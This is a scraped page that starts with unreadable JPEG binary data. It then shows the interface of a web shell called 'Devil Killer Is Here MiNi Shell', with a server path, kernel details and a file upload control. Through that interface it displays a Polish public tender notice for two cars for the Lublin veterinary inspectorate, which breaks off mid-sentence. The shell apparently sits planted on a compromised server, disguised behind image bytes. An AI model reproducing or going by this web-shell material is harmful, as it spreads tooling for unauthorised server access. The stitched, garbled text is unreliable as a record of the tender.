JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221115/0044012001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i dostawa dwóch samochodów na potrzeby Powiatowego Inspektoratu Weterynarii w Lublinie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">INSPEKCJA WETERYNARYJNA POWIATOWY INSPEKTORAT WETERYNARII W LUBLINIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431029151</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Spółdzielczości Pracy 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-147</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">lublin.piw@wiw.lublin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.piw.lublin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> WETERYNARIA </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i dostawa dwóch samochodów na potrzeby Powiatowego Inspektoratu Weterynarii w Lublinie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2fc90983-64d1-11ed-aea3-5a7c432eaced</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00440120</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00420660/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Zakup 2 szt. szmochodów na potrzeby Powiatowego Inspektoratu Weterynarii w Lublinie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://piwlublin.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zamawiający będzie się komunikował za pośrednictwem Platformy zakupowej znajdującej się pod adresem: https://piwlublin.ezamawiajacy.pl/ w zakładce: „Korespondencja</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>1) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej<br/>przeglądarki internetowej;<br/>3) Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2,;<br/>4) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>10. Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>− Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>− Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej<br/>przeglądarki internetowej;<br/>− Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS 1.2;<br/>− Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>13. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 2 GB w txt, rtf, pdf ,xps, odt, ods, odp,<br/>doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar,<br/>gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>8. Zamawiający określa dopuszczalny format kwalifikowanego podpisu elektronicznego, jako:<br/>1) dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,<br/>2) dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W<br/>związku z tym Wykonawca będzie zobowiązany załączyć prócz podpisanego dokumentu oddzielny plik z podpisem.<br/>4. Ogólne zasady korzystania z Platformy;<br/>1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Powiatowego Inspektoratu<br/>Weterynarii w Lublinie:<br/>https://piwlublin.ezamawiajacy.pl/ lub https://oneplace.marketplanet.pl. Wykonawca po wybraniu opcji „przystąp do postępowania”<br/>zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do<br/>założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia<br/>hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.<br/>2) Rejestracja konta następuje automatycznie poprzez:<br/>• podpisanie się pod wnioskiem podpisem elektronicznym (kwalifikowanym, osobistym lub profilem zaufanym)<br/>lub<br/>• kontakt z numerem telefonu podanym w potwierdzeniu<br/>lub<br/>• jeżeli użytkownik nie podpisze się na wniosku ani nie skontaktuje się telefonicznie. Konto zostanie aktywowane w ciągu<br/>maksymalnie 6 godzin roboczych<br/>Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu<br/>Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem Platformy<br/>Zakupowej Przez opcję „zadaj pytanie lub przy użyciu zakładki „Korespondencja”: w celu zadania pytania Zamawiającemu,<br/>Wykonawca klika lewym przyciskiem myszy klawisz ZADAJ PYTANIE. Powoduje to otwarcie okna, w którym należy uzupełnić dane<br/>Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym kodem weryfikującym z obrazka<br/>Wykonawca klika klawisz POTWIERDŹ, wykonawca uzyskuje potwierdzenie wysłania pytania poprzez komunikat systemowy<br/>&#34;pytanie wysłane&#34;.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>􀀀 administratorem Pani/Pana danych osobowych jest Powiatowy Inspektorat Weterynarii w Lublinie, Al. Spółdzielczości Pracy 3, 20-147 Lublin, e-mail: lublin.piw@wiw.lublin.pl, tel.: 81 748 37 48.<br/>􀀀 jeśli ma Pani/Pan pytania dotyczące sposobu i zakresu przetwarzania Pani/Pana danych osobowych w zakresie działania<br/>Zamawiającego, a także przysługujących Pani/Panu uprawnień, może się Pani/Pan skontaktować się z Inspektorem Ochrony<br/>Danych w Powiatowym Inspektoracie Weterynarii w Lublinie za pomocą adresu: lublin.piw@wiw.lublin.pl.<br/>􀀀 Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym<br/>postępowaniem o udzielenie zamówienia publicznego;<br/>􀀀 odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy z dnia 11 września 2019 r.– Prawo zamówień publicznych (Dz. U. z 2022 r. poz. 1719 z późn. zm.);<br/>􀀀 Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia lub na okres przechowywania tych danych zgodnie z wytycznymi o dofinansowania z<br/>środków UE;<br/>􀀀 obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>􀀀 w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>􀀀 posiada Pani/Pan: −<br/>- zgodnie z art. 15 RODO - prawo dostępu do danych osobowych Państwa dotyczących (z zastrzeżeniem, że w sytuacji, gdy<br/>skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku, mogą Państwo zostać<br/>zobowiązani do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego albo sprecyzowania nazwy lub daty zakończonego postępowania o<br/>udzielenie zamówienia);<br/>- zgodnie z art. 16 RODO - prawo do sprostowania Państwa danych osobowych (z tym, że skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z PZP oraz nie może naruszać integralności protokołu z postępowania oraz załączników do niego);<br/>- zgodnie z art. 18 RODO - prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu<br/>trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO<br/>(prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze<br/>środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu<br/>publicznego Unii Europejskiej lub państwa członkowskiego);<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie Państwa<br/>danych osobowych narusza przepisy RODO;<br/>przysługuje Państwu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Państwa danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Państwu:<br/>􀀀 zgodnie z art. 17 ust. 3 lit. b, d lub e RODO - prawo do usunięcia danych osobowych;<br/>􀀀 prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>􀀀 zgodnie z art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Fk.a.330.3.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I część- Zakup i dostawa samochodu osobowego typu Pick-up lub SUV 4x4 – 1 szt<br/>Szczegółowy opis przedmiotu zamówienia zawarto w zał. nr 1A do SWZ.<br/>1) Przedmiot zamówienia musi być fabrycznie nowy, wyprodukowany nie wcześniej niż w 2021 roku.<br/>2) Dostawa przedmiotu zamówienia odbywać się może wyłącznie w dni robocze w godzinach pracy Zamawiającego, tj. od<br/>pon. do pt. w godzinach 7-15.<br/>3) Wykonawca zapewni serwis samochodów stanowiących przedmiot umowy. Serwis będzie świadczony przez firmę<br/>posiadającą autoryzację producenta. Odległość do punktu serwisowego nie więcej niż 20 km od siedziby Zamawiającego.<br/>4) Wykonawca zobowiązuje się zapewnienia w cenie oferty pakiet ubezpieczeń: OC, AC,NNW, Assistance (również na<br/>Europę) na okres 12 miesięcy (1 roku ).<br/>Okres ubezpieczenia rozpoczyna się z dniem dostarczenia przez Wykonawcę i odbioru przez Zamawiającego przedmiotu<br/>umowy potwierdzonego podpisaniem przez Strony protokołu bez zastrzeżeń.<br/>5) Dostawa wraz z samochodami dokumentów w języku polskim:<br/>a) Wykonawca zobowiązany jest do złożenia u Zamawiającego wszystkich dokumentów samochodów, niezbędnych do<br/>rejestracji pojazdów we właściwym organie komunikacji w terminie nie dłuższym niż 2 dni robocze przed datą wydania<br/>samochodu (m.in. wyciąg świadectwa homologacji samochodu i inne dokumenty wymagane przy rejestracji samochodów w<br/>Polsce w dacie dostawy),<br/>b) dokumenty gwarancyjne samochodów, wykaz Autoryzowanych Stacji Serwisowych samochodów na terenie Polski i za<br/>granicą,<br/>c) instrukcję obsługi samochodów,<br/>d) pełen komplet kluczyków i pilotów w ilości zgodnej z ofertą producenta.<br/>e) harmonogram wymaganych przez producenta przeglądów technicznych, gwarancyjnych i pogwarancyjnych,<br/>6) Ilekroć w opisie przedmiotu zamówienia wskazane zostały znaki towarowe, patenty, pochodzenie, normy, aprobaty,<br/>specyfikacje techniczne i systemy referencji technicznych Zamawiający dopuszcza rozwiązania równoważne.<br/>Równoważność polega na możliwości zaoferowania przedmiotu zamówienia o nie gorszych parametrach technicznych,<br/>konfiguracjach, wymaganiach normatywnych itp.<br/>7) Szczegółowy zakres obowiązków stron zawarty jest we wzorze umowy stanowiącym załącznik nr 3 (A lub B) do SWZ.<br/>8) Wykonawca na dostarczony przedmiot zamówienia udziela Zamawiającemu następujących gwarancji jakości<br/>a) minimum 24 miesiące gwarancji ogólnej na samochód, w tym na silnik i wszystkie podzespoły mechaniczne (m.in.<br/>zawieszenie) bez limitu kilometrów (zgodnie ze złożoną ofertą)<br/>Gwarancja w powyższym zakresie stanowi kryterium oceny ofert.<br/>Liczona od daty podpisania protokołu zdawczo-odbiorczego przez Zamawiającego.<br/>Zakres gwarancji, uprawnienia zamawiającego oraz obowiązki gwaranta określono we wzorze umowy stanowiącym załącznik nr 3 (A lub B) do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34110000-1 - Samochody osobowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający, przy wyborze oferty najkorzystniejszej, zastosuje kryterium:<br/>1) Cena [C] 60% =60 pkt.<br/>2) Gwarancja [G] 40%= 40 pkt.<br/>2. Sposób obliczania punktów dla kryterium ceny :<br/>Poszczególny ofertom zostaną przyznane punkty za cenę obliczone wg poniższego wzoru:<br/>Cena oferty- max 60 pkt<br/>C = cena brutto oferty z najniższą ceną/ cena brutto oferty badanej<br/>x 60 pkt<br/>Sposób obliczania punktów dla kryterium gwarancja:<br/>Wykonawca na dostarczony przedmiot zamówienia udziela Zamawiającemu gwarancji jakości ogólnej na samochód, w tym na silnik i<br/>wszystkie podzespoły mechaniczne (m.in. zawieszenie) bez limitu kilometrów. Poszczególnym ofertom zostaną przyznane punkty za<br/>długość okresu gwarancji z zastrzeżeniem że okres gwarancji nie może być krótszy niż 24 miesiące. Jeżeli Wykonawca wskaże<br/>okres gwarancji krótszy niż 24 miesiące, to jego oferta będzie podlegać odrzuceniu. Jeżeli Wykonawca nie wpisze okresu gwarancji<br/>to będzie to również równoznaczne z zaoferowaniem minimalnego okresu gwarancji, tj. 24 miesiące i w takiej sytuacji Wykonawca<br/>nie otrzyma punktów w opisanym kryterium. W zawartej umowie zostanie wpisany okres gwarancji na podstawie informacji uzyskanych z formularza ofertowego.<br/>Punkty zostaną przyznane wg poniższego schematu:<br/> 24 miesiące-35 miesięcy 0 pkt<br/> 36 miesięcy-47 miesięcy 20 pkt<br/> 48-60 miesięcy 40 pkt<br/>Punkty zostaną przyznane na podstawie informacji zawartych w formularzu ofertowym. Kryterium gwarancja oceniany będzie na<br/>podstawie zadeklarowanego przez Wykonawcę okresu gwarancji (wyrażonego w pełnych miesiącach).<br/>Ostateczna ilość punktów dla każdej z ofert zostanie obliczona wg następującego wzoru:<br/>Łączna ilość punktów = C+G</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> II część – Zakup i dostawa samochodu osobowego lub SUV/terenowy – 1 szt.<br/>Szczegółowy opis przedmiotu zamówienia zawarto w zał. nr 1B do SWZ.<br/>Postanowienia wspólne dla obu części:<br/>1) Przedmiot zamówienia musi być fabrycznie nowy, wyprodukowany nie wcześniej niż w 2021 roku.<br/>2) Dostawa przedmiotu zamówienia odbywać się może wyłącznie w dni robocze w godzinach pracy Zamawiającego, tj. od<br/>pon. do pt. w godzinach 7-15.<br/>3) Wykonawca zapewni serwis samochodów stanowiących przedmiot umowy. Serwis będzie świadczony przez firmę<br/>posiadającą autoryzację producenta. Odległość do punktu serwisowego nie więcej niż 20 km od siedziby Zamawiającego.<br/>4) Wykonawca zobowiązuje się zapewnienia w cenie oferty pakiet ubezpieczeń: OC, AC,NNW, Assistance (również na<br/>Europę) na okres 12 miesięcy (1 roku ).<br/>Okres ubezpieczenia rozpoczyna się z dniem dostarczenia przez Wykonawcę i odbioru przez Zamawiającego przedmiotu<br/>umowy potwierdzonego podpisaniem przez Strony protokołu bez zastrzeżeń.<br/>5) Dostawa wraz z samochodami dokumentów w języku polskim:<br/>a) Wykonawca zobowiązany jest do złożenia u Zamawiającego wszystkich dokumentów samochodów, niezbędnych do rejestracji pojazdów we właściwym organie komunikacji w terminie nie dłuższym niż 2 dni robocze przed datą wydania samochodu (m.in. wyciąg świadectwa homologacji samochodu i inne dokumenty wymagane przy rejestracji samochodów w<br/>Polsce w dacie dostawy),<br/>b) dokumenty gwarancyjne samochodów, wykaz Autoryzowanych Stacji Serwisowych samochodów na terenie Polski i za<br/>granicą,<br/>c) instrukcję obsługi samochodów,<br/>d) pełen komplet kluczyków i pilotów w ilości zgodnej z ofertą producenta.<br/>e) harmonogram wymaganych przez producenta przeglądów technicznych, gwarancyjnych i pogwarancyjnych,<br/>6) Ilekroć w opisie 